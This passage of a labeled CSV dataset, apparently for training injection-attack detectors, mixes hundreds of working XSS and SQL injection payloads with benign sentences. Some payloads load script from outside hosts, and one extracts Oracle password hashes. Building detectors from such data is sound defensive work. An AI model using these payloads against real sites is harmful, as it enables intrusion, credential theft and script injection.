STREET, WELCH WV 24801"",""city"":""729"",""telephone"":""5071907857""}",3,normal,26903 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i",2,SQLi,11953 "{""id"":null,""name"":""forth""}",3,normal,26786 The state's Republicans will select their Senate candidate in Tuesday's primary.,3,normal,25374 <x onmouseover=alert(1)>hover this!,1,XSS,9138 Samsung EVO Select 256GB U3 MicroSDXC Memory Card with Adapter,3,normal,25738 1 where 8966 = 8966,2,SQLi,22006 "<div draggable=""true"" contenteditable>drag me</div><bdo ondragover=alert(1) contenteditable>drop here</bdo>",1,XSS,1173 "select * from users where id = 1 or ( \ ) = 1 union select 1,@@VERSION -- 1",2,SQLi,15586 "<head onmousemove=""alert(1)"">test</head>",1,XSS,7930 "After you've filled in the details, select ""Place Order"" to buy.",3,normal,26400 "Lady Macbeth is out in select U.S. theaters tomorrow, July 14.",3,normal,25919 "{""id"":null,""firstName"":""Steleven"",""lastName"":""Ang"",""address"":""7422 Martin Ave #8"",""city"":""742"",""telephone"":""4758838722""}",3,normal,27022 Select sparkle.,3,normal,24684 select ( case when ( 3773 = 3722 ) then 3773 else 3773* ( select 3773 from mysql.db ) end ) #,2,SQLi,14555 """),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,15916 DADA Daily snacks are available online and in select stores.,3,normal,26255 "1%"" ) union all select null,null,null,null,null,null,null--",2,SQLi,17282 "-4233%"" ) or ( 8459 = 8459 ) *4906 and ( ""%"" = """,2,SQLi,18705 """They belong to a select group who pay for early, firsthand reports on Capitol Hill"" who are, as one lawyer puts it, ""buying information from members of Congress in a perfectly legal way."" This ""select group"" of hedge funds get meetings with lawmakers and their aides through financial firms like JNK Securities who then gather commission on the subsequent deals it brokers.",3,normal,26453 <address onblur=alert(1) tabindex=1 id=x></address><input autofocus>,1,XSS,2645 <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>,1,XSS,5349 <dfn onpointerup=alert(1)>XSS</dfn>,1,XSS,9035 or '7659' = '7659,2,SQLi,22090 "1"" ) as zuzm where 1211 = 1211 and elt ( 5458 = 2966,2966 ) --",2,SQLi,16989 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></tfoot>",1,XSS,206 "<area onmouseover=""alert(1)"">test</area>",1,XSS,7899 <x%2Fonxxx=1,1,XSS,9836 "<a href=""\xE2\x80\x80javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2016 "-5672' ) ) union all select 9371,9371,9371,9371,9371,9371--",2,SQLi,17313 "-7381' ) ) or elt ( 5882 = 5919,5919 ) and ( ( 'nzri' = 'nzri",2,SQLi,17039 "<ins onmouseover=""alert(1)"">test</ins>",1,XSS,8464 1'|| ( select 'boib' where 9595 = 9595,2,SQLi,19699 "&lt;SCRIPT/SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,1976 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></listing>",1,XSS,164 <script id=x tabindex=1 onactivate=alert(1)></script>,1,XSS,5000 Select your discussion.,3,normal,24912 <frameset onpageshow=alert(1)>,1,XSS,9560 "<button oncut=""alert(1)"" contenteditable>test</button>",1,XSS,4715 "<th onmouseout=""alert(1)"">test</th>",1,XSS,9070 "<style>@keyframes x{}</style><marquee style=""animation-name:x"" onanimationstart=""alert(1)""></marquee>",1,XSS,1433 "1' where 4039 = 4039 union all select null,null,null,null,null,null,null,null--",2,SQLi,15285 Fetch records where necessary.,3,normal,23294 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ( 'knbx' like 'knbx",2,SQLi,12859 "1%' ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13999 "Escape to the tranquility of the spa, indulge in superb cuisine and allow expert sommeliers to select a perfect wine.",3,normal,26217 "<cite onmouseleave=""alert(1)"">test</cite>",1,XSS,7713 <small onpointermove=alert(1)>XSS</small>,1,XSS,7739 "<picture oncut=""alert(1)"" contenteditable>test</picture>",1,XSS,4285 <param onpointerenter=alert(1)>XSS</param>,1,XSS,7534 "1' ) as bfgl where 8959 = 8959 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14163 "-4849"" ) ) or ( 5005 = 9111 ) *9111 and ( ( ""catv"" like ""catv",2,SQLi,17093 "1%' ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13517 "-5898"" ) ) as fycd where 7135 = 7135 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10077 1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ),2,SQLi,10875 "<source draggable=""true"" ondragstart=""alert(1)"">test</source>",1,XSS,3386 "<menuitem draggable=""true"" ondragleave=""alert(1)"">test</menuitem>",1,XSS,2841 Select support.,3,normal,24739 Select your adjust.,3,normal,25043 I'm considering where to take a photography class.,3,normal,23888 1' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( 'ytxg' = 'ytxg,2,SQLi,15102 "-9015%"" ) union all select 6948,6948--",2,SQLi,19739 "1%' ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15965 "1"" ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""mzhk"" = ""mzhk",2,SQLi,10619 Delete the apps.,3,normal,22830 1' ) where 6440 = 6440 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,15457 <applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus>,1,XSS,2098 "-1269' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'gohv' like 'gohv",2,SQLi,10219 "Whichever finish you select, you'll be saving a decent 26%.",3,normal,25138 "<table onmouseup=""alert(1)"">test</table>",1,XSS,8002 "Tap the star button, and select one of the AR games.",3,normal,25506 "<br draggable=""true"" ondragenter=""alert(1)"">test</br>",1,XSS,5019 "select * from users where id = 1 or ""?#"" or 1 = 1 -- 1",2,SQLi,17857 Check conditions where applicable.,3,normal,23326 "1 union all select null,null,null,null,null--",2,SQLi,19018 select case when 4176 = 6138 then 1 else null end--,2,SQLi,18308 "1"" ) ) as xtlt where 9293 = 9293",2,SQLi,20328 <base onfocusout=alert(1) tabindex=1 id=x></base><input autofocus>,1,XSS,2759 "<element onmouseover=""alert(1)"">test</element>",1,XSS,6399 "1' ) ) as pstn where 6691 = 6691 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10101 select ( case when ( 8978 = 1426 ) then 1 else 8978* ( select 8978 from master..sysdatabases ) end ) --,2,SQLi,13954 "So, astrology might not help you select the perfect roomie.",3,normal,25540 "1%"" or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14106 <object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus>,1,XSS,2099 <img onpointerleave=alert(1)>XSS</img>,1,XSS,8332 "admin"" or ""1"" = ""1",2,SQLi,22039 "<tr ondblclick=""alert(1)"">test</tr>",1,XSS,9031 "<menuitem onkeyup=""alert(1)"" contenteditable>test</menuitem>",1,XSS,3473 "1' ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( 'vgkt' = 'vgkt",2,SQLi,12913 select ( case when ( 6839 = 2730 ) then 6839 else 6839* ( select 6839 from mysql.db ) end ) #,2,SQLi,14496 "select * from users where id = 1 <@$_ union select 1,version ( ) -- 1",2,SQLi,16254 "-2112 union all select 2995,2995,2995,2995,2995--",2,SQLi,18579 ; begin declare @var varchar(8000) set @var=' ...,2,SQLi,18533 "<style>@keyframes x{}</style><hr style=""animation-name:x"" onanimationstart=""alert(1)""></hr>",1,XSS,1735 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--",2,SQLi,18418 "{""id"":null,""name"":""worse""}",3,normal,27342 "<style>:target {color:red;}</style><dfn id=x style=""transition:color 1s"" ontransitionend=alert(1)></dfn>",1,XSS,1285 "1' in boolean mode ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12509 "1' ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'bmbt' = 'bmbt",2,SQLi,12472 "1'|| ( select 'adiv' from dual where 9842 = 9842 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) ||'",2,SQLi,10052 select sleep ( 5 ) --,2,SQLi,21652 "<style>:target {color:red;}</style><dialog id=x style=""transition:color 1s"" ontransitionend=alert(1)></dialog>",1,XSS,1021 "-3009'+ ( select 'gqbo' where 6915 = 6915 union all select 6915,6915--",2,SQLi,16208 "To pick photos, you can use either Get Latest Photos to select a specified number of images in chronological order, starting with the newest, or Select Photos to pick them manually.",3,normal,25266 "?callback=javascript:alert(1)"",",1,XSS,9521 "-7139"" ) where 2723 = 2723 or 3900 = 5082--",2,SQLi,19218 "-2601' ) union all select 2866,2866,2866,2866,2866,2866--",2,SQLi,17544 "<style>@keyframes x{}</style><nobr style=""animation-name:x"" onanimationend=""alert(1)""></nobr>",1,XSS,1653 "<div draggable=""true"" contenteditable>drag me</div><listing ondragover=alert(1) contenteditable>drop here</listing>",1,XSS,832 "<style>@keyframes x{}</style><figcaption style=""animation-name:x"" onanimationstart=""alert(1)""></figcaption>",1,XSS,1171 1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,10744 <x contenteditable onpaste=alert(1)>paste here!,1,XSS,6258 "<i draggable=""true"" ondragenter=""alert(1)"">test</i>",1,XSS,5471 1%' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and '%' = ',2,SQLi,16068 "1' ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 'qtfl' = 'qtfl",2,SQLi,10282 1' ) where 9317 = 9317 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,16087 "1' ) and make_set ( 8403 = 8403,8899 ) and ( 'kyxl' = 'kyxl",2,SQLi,17275 "1' ) where 1470 = 1470 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11190 "{""id"":null,""firstName"":""Leong"",""lastName"":""Tommi"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27144 <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;,1,XSS,5095 1' where 7176 = 7176,2,SQLi,21848 "<style>:target {transform: rotate(180deg);}</style><progress id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></progress>",1,XSS,543 "<b onmouseout=""alert(1)"">test</b>",1,XSS,9327 "-8038' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'xfyq' = 'xfyq",2,SQLi,17071 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27",2,SQLi,12717 Update your status.,3,normal,22780 "Guys seriously start realizing league of legends is a TEAMGAME and it starts in champ selection, even in SoloQueue.. . Talking about the hovered picks and teamcomps is not toxic, not uncalled for & not stupid, and you cant say ""let him play what he wants or dodge"" cuz thats stupid",3,normal,26499 "<iframe draggable=""true"" ondragleave=""alert(1)"">test</iframe>",1,XSS,3392 "1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'ibdj' = 'ibdj",2,SQLi,12104 "1"" ) where 9680 = 9680 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11178 "select * from users where id = '1' *1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,14250 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--",2,SQLi,17001 "-8364' ) union all select 4732,4732,4732,4732,4732,4732,4732,4732,4732#",2,SQLi,16053 "{""id"":null,""firstName"":""Nurul"",""lastName"":""Hidayah"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27533 "1 ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( 3872 = 3872",2,SQLi,10799 "1 ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 8529 = 8529",2,SQLi,11029 <dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus>,1,XSS,3961 <acronym onpointerdown=alert(1)>XSS</acronym>,1,XSS,6646 Show me where it's stored.,3,normal,23267 "1"" ) ) ) rlike sleep ( 5 ) #",2,SQLi,20843 1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,16124 "-1543%' union all select 9341,9341,9341,9341,9341,9341,9341,9341,9341--",2,SQLi,16111 <script itworksinallbrowsers>/*<script* */alert(1)</script ?,1,XSS,3588 Select track.,3,normal,24665 "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=",1,XSS,2565 "1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 'vjnf' like 'vjnf",2,SQLi,10846 She must select.,3,normal,24421 "<track oncopy=""alert(1)"" contenteditable>test</track>",1,XSS,5038 "<div draggable=""true"" contenteditable>drag me</div><iframe ondrop=alert(1) contenteditable>drop here</iframe>",1,XSS,1082 "<b onkeydown=""alert(1)"" contenteditable>test</b>",1,XSS,5893 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20",2,SQLi,14561 admin' ) or '1' = '1'#,2,SQLi,21381 "<a href=""\xE2\x80\x86javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2025 "1"" ) where 1673 = 1673 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13133 "In reality, only a select few actually get this opportunity.",3,normal,26006 <table onpointerout=alert(1)>XSS</table>,1,XSS,7912 "Select one color for the walls, and use the second color in the bedding, wall accents, chair upholstery and window coverings.",3,normal,25621 Where's the best place to take a yoga class?,3,normal,23747 "-1059"" ) union all select 1276,1276,1276,1276,1276,1276,1276,1276#",2,SQLi,16634 "<style>:target {color:red;}</style><nextid id=x style=""transition:color 1s"" ontransitionend=alert(1)></nextid>",1,XSS,1015 "1"" ) where 2388 = 2388 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,14895 -5694 ) ) as cxnb where 6858 = 6858 or 9323 = 9323#,2,SQLi,18337 "<em onmouseup=""alert(1)"">test</em>",1,XSS,9238 "<mark onpaste=""alert(1)"" contenteditable>test</mark>",1,XSS,5253 <script>alert(‘XSS’)</script>,1,XSS,9599 <title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus>,1,XSS,2181 "1%"" union all select null,null,null,null,null,null,null,null#",2,SQLi,17105 "1' ) ) ) union all select null,null,null,null,null,null--",2,SQLi,17532 Let's decide where to go for our adventure.,3,normal,23804 "1', ( select ( case when ( 7734 = 7734 ) then ( select benchmark ( 5000000,md5 ( 0x72747341 ) ) ) else 7734* ( select 7734 from mysql.db ) end ) )",2,SQLi,12111 1 ) where 7159 = 7159,2,SQLi,21604 "<samp onkeyup=""alert(1)"" contenteditable>test</samp>",1,XSS,5112 Select your dream gadget.,3,normal,24328 "<style>@keyframes x{}</style><li style=""animation-name:x"" onanimationend=""alert(1)""></li>",1,XSS,1780 Select bottle.,3,normal,24526 1' ) ) and sleep ( 5 ) and ( ( 'krrr' = 'krrr,2,SQLi,19042 1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and 'mabd' = 'mabd,2,SQLi,15403 Where did you discover that hidden treasure?,3,normal,23970 "<TD BACKGROUND=""javascript:alert('XSS')"">",1,XSS,7607 select sleep ( 5 ) and 'yzix' = 'yzix,2,SQLi,19897 select ( case when ( 1005 = 5996 ) then 1 else 1005* ( select 1005 from master..sysdatabases ) end ) --,2,SQLi,13968 "1%"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ""%"" = """,2,SQLi,17445 Select your flavor.,3,normal,24807 "{""id"":null,""name"":""Tentacruel""}",3,normal,27541 "-1031%"" union all select 6832,6832,6832,6832#",2,SQLi,19057 1' ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 'guxv' = 'guxv,2,SQLi,10497 "select * from users where id = 1 or 1#"" ( union select version ( ) ,version ( ) -- 1",2,SQLi,14957 1' ) where 1424 = 1424 and sleep ( 5 ) --,2,SQLi,19387 "-3102 ) union all select 6707,6707,6707,6707--",2,SQLi,18955 <noembed id=x tabindex=1 onfocus=alert(1)></noembed>,1,XSS,5134 "<a style=""-o-link:'javascript:javascript:alert(1)';-o-link-source:current"">X",1,XSS,2161 "1 ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11353 1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 'gsjp' = 'gsjp,2,SQLi,14066 "1"" where 1920 = 1920 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14590 "<A HREF=""http://0102.0146.0007.00000223/""></A>",1,XSS,6447 "<command draggable=""true"" ondrag=""alert(1)"">test</command>",1,XSS,3969 "<style>@keyframes x{}</style><article style=""animation-name:x"" onanimationstart=""alert(1)""></article>",1,XSS,1430 "<template draggable=""true"" ondragend=""alert(1)"">test</template>",1,XSS,3083 <frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus>,1,XSS,2522 "1' and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11778 "-6519' ) ) as tdlt where 5040 = 5040 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10071 "{""id"":null,""name"":""bow""}",3,normal,27464 "Select, don't hesitate.",3,normal,24795 <body id=x tabindex=1 onfocusin=alert(1)></body>,1,XSS,6021 "-9966' ) ) union all select 7230,7230,7230,7230,7230,7230,7230#",2,SQLi,16856 "1%' union all select null,null,null,null,null,null,null,null--",2,SQLi,16922 "<>""'%;)(&+",2,SQLi,22413 Plant some vibrant flowers.,3,normal,22698 <object id=x tabindex=1 onbeforeactivate=alert(1)></object>,1,XSS,3729 I want to select a recipe for tonight's dinner.,3,normal,23779 <body/onload=&lt;!--&gt;&#10alert(1)>,1,XSS,8556 Order a Hawaiian pizza.,3,normal,22705 "For a select few beer geeks, the answer is yes.",3,normal,26185 I'll select a gift for my friend's birthday.,3,normal,23721 <img srcset=1 onerror=alert(1)>,1,XSS,9499 <progress onpointerdown=alert(1)>XSS</progress>,1,XSS,6253 "<big oncut=""alert(1)"" contenteditable>test</big>",1,XSS,5928 1' in boolean mode ) and ( 8610 = 2985 ) *2985#,2,SQLi,18868 "-8143 union all select 4492,4492,4492,4492,4492,4492,4492,4492,4492#",2,SQLi,16430 1' and ( 3423 = 7789 ) *7789 and 'pdia' like 'pdia,2,SQLi,18474 "1%' ) union all select null,null,null,null,null,null#",2,SQLi,18061 "<q oncontextmenu=""alert(1)"">test</q>",1,XSS,8897 "<rb onmouseenter=""alert(1)"">test</rb>",1,XSS,8709 "<style>:target {color:red;}</style><rb id=x style=""transition:color 1s"" ontransitionend=alert(1)></rb>",1,XSS,1378 "<style>@keyframes x{}</style><bdo style=""animation-name:x"" onanimationend=""alert(1)""></bdo>",1,XSS,1726 "<input draggable=""true"" ondragstart=""alert(1)"">test</input>",1,XSS,3756 1' ) as llug where 2244 = 2244 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10541 -7345 ) union all select 3866#,2,SQLi,20593 "Identify, select and demonstrate understanding of appropriate descriptive and inferential statistics.",3,normal,26064 "<details oncopy=""alert(1)"" contenteditable>test</details>",1,XSS,4084 "1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and 'uwep' = 'uwep",2,SQLi,11894 Up to 30% off select Solar Panels and Electrical Equipment,3,normal,25218 Where is my iPhone?,3,normal,23005 1%' ) ) ) and 4595 = 4595#,2,SQLi,20972 "1"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ""igop"" = ""igop",2,SQLi,12524 "1' and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and 'qyyg' = 'qyyg",2,SQLi,13081 RLIKE SLEEP(5) AND '1337' LIKE '1337,2,SQLi,19945 "-3104"" union all select 5717,5717,5717,5717,5717,5717,5717,5717,5717--",2,SQLi,16164 Where's your SQL assignment?,3,normal,23429 "1' or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and 'owwf' = 'owwf",2,SQLi,10797 1 ) as nmlm where 9872 = 9872,2,SQLi,20741 "1"" ) as ffon where 2738 = 2738 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,9975 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""ejmj"" like ""ejmj",2,SQLi,14595 "1"" ) where 2088 = 2088 union all select null,null,null,null--",2,SQLi,17054 Insert a memory.,3,normal,22807 I need to select a playlist for the road trip.,3,normal,23953 "{""id"":null,""firstName"":""Nazierul Haqeem"",""lastName"":""Laili"",""address"":""6 Battery Road 31-00 Six Battery Road Building"",""city"":""469"",""telephone"":""5087170643""}",3,normal,27214 "1' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'lwyo' = 'lwyo",2,SQLi,14239 "1%"" ) ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16021 "<input onmouseenter=""alert(1)"">test</input>",1,XSS,7168 Select napkin.,3,normal,24535 Select a topic for a conversation.,3,normal,24123 "1' where 6417 = 6417 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11206 "{""id"":null,""name"":""Hitmonchan""}",3,normal,26825 "<dd draggable=""true"" ondragstart=""alert(1)"">test</dd>",1,XSS,4877 1' and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'lvyw' = 'lvyw,2,SQLi,10760 "The Industrial Select Sector SPDR Fund, which tracks companies in the Industrial Select Sector Index, gained 1.18%.",3,normal,25429 "1"" ) ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16014 1' where 4460 = 4460,2,SQLi,21756 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))",2,SQLi,12282 Retrieve info where necessary.,3,normal,23457 1' ) ) ) and sleep ( 5 ) and ( ( ( 'hwjy' = 'hwjy,2,SQLi,18568 "<style>:target {transform: rotate(180deg);}</style><nav id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></nav>",1,XSS,687 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",2,SQLi,11459 "Unfortunately such allusion to these disconnected certainties as alone might be introduced here would be too brief for comprehension, and we are forced to select a few of the broader hypotheses for a treatment that may seem dogmatic and prejudiced.",3,normal,25229 "select * from generate_series ( 6730,6730,case when ( 6730 = 9431 ) then 1 else 0 end ) limit 1--",2,SQLi,14315 &lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;,1,XSS,2463 "1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,12299 "1'|| ( select 'cqjw' from dual where 7335 = 7335 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) ||'",2,SQLi,11913 "<param 